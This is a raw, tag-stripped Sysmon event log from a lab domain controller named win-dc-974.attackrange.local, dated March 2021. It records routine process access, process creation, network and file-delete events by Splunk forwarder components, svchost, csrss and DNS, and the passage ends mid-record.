16:57:54.421{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245402Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:54.421{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245401Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:54.421{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245400Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:54.421{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6E92-603E-0DAB-00000000AD01}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002245399Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:54.421{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6E92-603E-0DAB-00000000AD01}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002245398Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:54.422{05ADC7E1-6E92-603E-0DAB-00000000AD01}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002245426Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:55.671{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7FE0B0E0CFE213DFB340DE93E094AD7,SHA256=8AC5EC85C58AE5C7B1317DEC27C8B479BFACE6B929548C9474DD379D88A77B2B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002245425Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:55.608{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6E93-603E-0FAB-00000000AD01}9900C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245424Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:55.608{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245423Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:55.608{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245422Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:55.608{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245421Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:55.608{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245420Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:55.608{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6E93-603E-0FAB-00000000AD01}9900C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002245419Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:55.608{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6E93-603E-0FAB-00000000AD01}9900C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002245418Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:55.609{05ADC7E1-6E93-603E-0FAB-00000000AD01}9900C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000002245417Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:45.313{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local56064- 23542300x80000000000000002245416Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:55.188{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1DEF55F1D51163F479EBEA2664012458,SHA256=DA75A266F06CFE3292950C9EF5E6CED4E1E7F5E55A20A594B51890C1CD135DFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245431Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:56.688{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B66DFE57C12815AB7EA09B3B589C659,SHA256=A0277F4339A19ED045654390B25CA0FA25A1C70B4BAAE6C7BF0D034D82003FA6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245430Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:46.329{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60219-false10.0.1.12-8000- 354300x80000000000000002245429Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:46.328{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local56064- 354300x80000000000000002245428Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:46.250{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local56150- 23542300x80000000000000002245427Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:56.202{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C0150984659378965E134F6C48E4B995,SHA256=8931DFDA53D875A7E3925919A691AC81FD0CC14870330B274475428D30F2C98D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245433Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:57.702{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9A90C4A52BDAC7788E5C153C38B6C7C,SHA256=69B2F515D358E2CAEA0E44ABB0DEF6C3D5494C8801CCB5B9E2AA6B80156BB4F9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245432Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:47.266{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local56150- 23542300x80000000000000002245434Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:58.733{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52C0B89017C4F3B85508D65993BAC155,SHA256=6EA538264825489224F65B254BDD68913FC531DF09622CF85163C18CDE79F3C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245436Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:59.733{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47235F1A4A50BE8668EF84F8A2B829ED,SHA256=28463A232A3CEECC1BDED218CF74C95E234C2BC7AB1CA51EB661FAB081D3960F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245435Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:59.702{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=24A69508CE66C7DFE216326751BFA176,SHA256=02CBC2A99D4FF78D9A6EA27EAA9CB1C79CDE84171F0959317EFCFB92911E1691,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245437Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:00.749{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4ACB1F44E9AE44185C55046CE6D7EE06,SHA256=E40B5AEB47A8C54B88592B422FC7331502D6239DC4C55180E5B164E60CFD83C3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245440Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:51.329{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60220-false10.0.1.12-8000- 23542300x80000000000000002245439Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:01.764{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87A9C78F5A3322B9BCE6EFFF4A4EA611,SHA256=3D26E94FA7BAFBB9922222D1A43B0F5B4501313E786A85D474D725E2493510AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245438Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:01.202{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6F3AE16C5C29FB957619DA6534DC43E4,SHA256=7D7FBB0534BAF6CF7F8DA27158545CA6D9A65E9CFFC413FC4641201292E45690,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002245449Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:02.988{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6E9A-603E-10AB-00000000AD01}5016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245448Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:02.988{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245447Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:02.988{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245446Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:02.988{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245445Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:02.988{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245444Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:02.988{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6E9A-603E-10AB-00000000AD01}5016C:\Program 